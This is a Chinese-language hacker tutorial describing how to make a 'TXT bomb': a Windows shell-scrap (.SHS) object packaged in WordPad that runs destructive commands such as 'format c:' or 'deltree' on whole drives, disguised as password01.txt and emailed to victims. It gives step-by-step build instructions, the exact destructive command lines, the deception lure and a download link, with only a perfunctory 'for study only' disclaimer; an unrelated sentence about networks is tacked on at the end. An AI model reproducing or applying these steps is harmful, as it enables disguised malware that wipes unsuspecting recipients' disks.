[摘要]傲者TXT炸弹(标准版) 前几天我在黑白发表了一篇名为<小鸟教小鸟制作TXT炸弹>一文,得到很多热心网友的大力推荐,少言在此深表谢意!由于当时时间仓促所以,该"炸弹"还存在一些问题.经过一番的修...
傲者TXT炸弹(标准版)
前几天我在黑白发表了一篇名为<小鸟教小鸟制作TXT炸弹>一文,得到很多热心网友的大力推荐,少言在此深表谢意!由于当时时间仓促所以,该"炸弹"还存在一些问题.经过一番的修改,修复了原来的一些BUG,在98第二版和2000服务器版下通过测试.并将原来的一个炸弹分成了三个具有不同威力的炸弹分别执行.
下面我就将改良后的TXT炸弹的制作方法教给大家:1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)
真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了!
(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上面的文件,呵呵!)
原文件下载地址:
http://www.aosoao.8u8.com/shs.zip网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。
……